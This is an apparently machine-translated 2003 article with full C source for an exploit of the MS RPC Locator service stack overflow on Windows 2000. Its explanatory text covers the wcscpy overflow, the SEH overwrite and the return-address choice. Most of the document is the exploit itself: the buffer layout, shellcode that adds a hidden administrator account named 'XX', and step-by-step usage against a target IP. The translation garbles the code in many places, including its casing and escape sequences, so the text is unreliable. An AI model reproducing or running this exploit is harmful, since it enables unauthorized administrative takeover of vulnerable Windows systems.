[Analysis] ms rpc Locator service exploit for Win2k (new version)

Ms rpc Locator service exploit for Win2k (new version)

Created:
Article attributes: original
Article submission: eyas (ey4s_at_21cn.com)

/* Configure /*------------------------------------------------------------------------------------
Created at: 2003-04-05
Last Updated: 2003-04-07
I tried to download rpcexp. c from packetstorm a few days ago. But the Locator Service failed. So I want to see how it works.
. Later, I found some information, which turned out to be a stack overflow. The problem lies in the wcscpy function. After tracking, the function call relationship is
Such:

Locator! Locator: nsi_binding_lookup_begin:
|__ Locator! Locator: nsi_binding_lookup_begin_name:
|__ Locator! Cremotelookuphandle: Finished:
|__ Locator! Cbroadcastlookuphandle: Initialize:
|__ Locator! Getbroadcastresults
|__ Locator! Formquerypacket
|__ Wcscpy <-- buff Overflow

Getbroadcastresults function return address in Buff + 0x514, tested, Win2k Chinese, English sp0-3 version
The overflow points are the same. However, if the returned address of the getbroadcastresults function is overwritten! Formquerypacket
The code below will cause the 0xc0000005 error. In this case, we have to overwrite the Seh. Exception handler address
Stored in Buff + 0x504, both Chinese and English sp0-3 versions are the same. The jmpaddr of rpcexp. C written by Marcin woak is 0x0090f8f0,
I guess this address is the address stored in shellcode during his own test. He jumped directly to shellcode at Seh,
During the test, wcscpy copied our buff to the vicinity of 0x009xxxxx. Of course, this was tested on different platforms.
It may be different or even very different. It's just speculation, because I am a beginner and cannot understand his code :(.

The modified seh obviously points to jmp esp here. Later, we found that when exception occurs,
The Windows system is preparing to handle the exception in an instant. The register EBX points to the address where the exception handler address is currently stored.
If the exception handler address is stored in 0x0098f8ec, The EBX value is 0x0098f8e8. In this case,
Rewrite the exception handler address to the call EBX address to execute our shellcode. Later, I went back to see how great it was.
In his article, I see that this article has been written in more detail. I read the information too seriously :(. But I have never said
So I don't know why.

The address of call ebxis not common on the same platform. Later, the locator.exe version of each platform will be released, and sp0 and SP1 will be found.
The Chinese version is 5.0.2195.1, the sp2 version is 5.0.2195.2505, And the SP3 version is 5.0.2195.3761.
Is 5.0.2195.6136. Locator.exe has fewer changes, so it is decided to use the call EBX address in locator.exe, Kernel32
Almost every hotfixs of these DLL files must be updated. The call EBX address in these DLL files is not universal.

When searching, it is found that there are 10 identical call EBX addresses in SP1 and SP2, and there is one same address in SP1 and SP3, SP2 and SP3
There is no same address. However, we also found a very interesting place. For example, if call EBX exists in 0x0100a8eb in SP1, then 0x0100a8ec in SP3
There is also a call EBX, hey ..

After comparison, I decided to use 0x0100aee5 for JMP ADDR. In sp0, SP1, and SP2,
0: 004> U 0x0100aee5
0100aee5 ffd3 call EBX
In SP3,
0: 004> U 0x0100aee5
0100aee5 40 Inc eax
0100aee6 ffd3 call EBX

The structure of the buff we send is as follows:
| Rpc_head_info? (8) | Nop (0x4f8) | JMP 0xa (2) | Nop (2) | call ebx addr (4) | Nop (4) | shellcode |

Shellcode has no special requirements, as long as there is no "/x00/x00", otherwise it will be truncated by wcscpy.
Most of the shellcode code is directly from a great article, thanks to him and wonderful articles such as backend and ipxodi.
About buffer overflow on Windows.
Optional -------------------------------------------------------------------------------------*/
# Define Unicode
# Define rpc_unicode_supported

# Include <stdio. h>
# Include <rpc. h>
# Include <rpcnsi. h>

# Pragma comment (Lib, "rpcns4.lib ")

// Seh handler address offset. The overflow points of all Win2k versions are the same.
# Define sehoffset 0x504
// Call ebx addr in locator.exe Process
/*
Sp0 SP1 SP2
0: 004> U 0x0100aee5
0100aee5 ffd3 call EBX
SP3
0: 004> U 0x0100aee5
0100aee5 40 Inc eax
0100aee6 ffd3 call EBX
*/
# Define jmpaddr "/xe5/XAE/x00/x01"
# Define jmpover "/xeb/x0a/x90/x90" // JMP 0xa

// Hey, guy, you shoshould modify this code slightly by yourself.
Char shellcode [] =
"/X55/x8b/xec/xeb/x64/x5a/xb8/x04"
"/X00/xf1/x77/x81/x38/x4d/x5a/x90"
"/X00/x74/x03/x48/xeb/xf5/x8b/xd8"
"/X8b/x73/x3c/x03/xf3/x8b/x76/x78"
"/X03/xf3/x8b/x7e/x20/x03/xfb/x8b"
"/X4e/x14/x33/xed/x56/x57/x51/x8b"
"/X3f/x03/xfb/x8b/xf2/x33/xc9/x83"
"/Xc1/x0e/xf3/xA6/x74/x08/x59/x5f"
"/X83/xc7/x04/x45/xe2/xe7/x59/x5f"
"/X5e/x8b/XCD/x8b/X46/x24/x03/xc3"
"/XD1/xe1/x03/xc1/x33/xc9/x66/x8b"
"/X08/x8b/X46/x1c/x03/xc3/xc1/xe1"
"/X02/x03/xc1/x8b/x00/x03/xc3/xeb"
"/X02/xeb/x37/x8b/xfa/x8b/xf2/x89"
"/X06/x83/xc7/x0f/x57/x53/xFF/xd0"
"/X83/xc6/x04/x89/x06/x83/xc7/x08"
"/X57/x53/x8b/X46/xfc/xFF/xd0/x83"
"/Xc6/x04/x89/x06/x33/xc0/x50/x83"
"/Xc7/x06/x57/x8b/X46/xfc/xFF/xd0"
"/Xb8/xFF/x50/x8b/x06"
"/XFF/xd0/xe8/x5e/xFF"
"Getprocaddress" "/x0"
"Winexec" "/x0"
"Sleep" "/x0"
"CMD/C net.exe user XX 1A !. 9nh/Add & net localgroup administrators XX/Add ";

DWORD winapi func (lpvoid LP)
{
Unsigned char buff [4000];
Unsigned short * pszstrbinding = NULL;
Rpc_ns_handle hnshandle;
Unsigned long nssntxtype = rpc_c_ns_syntax_default;
Rpc_status status;
Unsigned long I;

// Fill in the buff
Buff [0] = '/';
Buff [1] = 0;
Buff [2] = '.';
Buff [3] = 0;
Buff [4] = ':';
Buff [5] = 0;
Buff [6] = '/';
Buff [7] = 0;
For (I = 8; I <sehoffset-4; I ++)
{
Buff [I] = '/x90 ';
}
Strcpy (& buff [I], jmpover );
// Jmpaddr may contain 0
Memcpy (& buff [I + 4], jmpaddr, 4 );
Strcpy (& buff [I + 8], "/x90/x90/x90/x90 ");
Memcpy (& buff [I + 12], shellcode, sizeof (shellcode ));

Rpctryexcept
{
Status = rpcnsbindinglookupbegin (nssntxtype,
(Unsigned short *) buff,
0,
Null,
0,
& Hnshandle );
Printf ("rpcnsbindinglookupbegin returned 0x % x/N", status );
}
Rpcexcept (1)
{
Printf ("RPC Runtime raised exception 0x % x/N", rpcexceptioncode ());
}
Rpcendexcept
Return 0;
}
Void usage ()
{
Printf ("/nxlocator -- ms rpc Locator service exploit for win2k_en_cn_sp0-3/N"
"Author: cooleyas@21cn.com 2003-04-07/N"
"Based on Marcin woaks/'s rpcexp. c/n"
"Usage:/N"
"1.set registry values in your workstation as below:/N"
"HKLM // software // Microsoft // RPC // nameservice // networkaddress = targetip/N"
"HKLM // software // Microsoft // RPC // nameservice // servernetworkaddress = targetip/N"
"2. Establish Null Session: net use // targetip // IPC $/"/"/u:/"/"/N"
"3.run exploit: xlocator/N"
"If success, target will add a user/" XX/"passwd is/" 1A !. 9nh/"./N ");
}
Void _ crtapi1 main (INT argc, char ** argv)
{

If (argc! = 1)
{
Usage ();
Exit (0 );
}
Createthread (null, 0, func, null, 0, null );
Sleep (4000 );
Printf ("done./N ");
}/* End of main */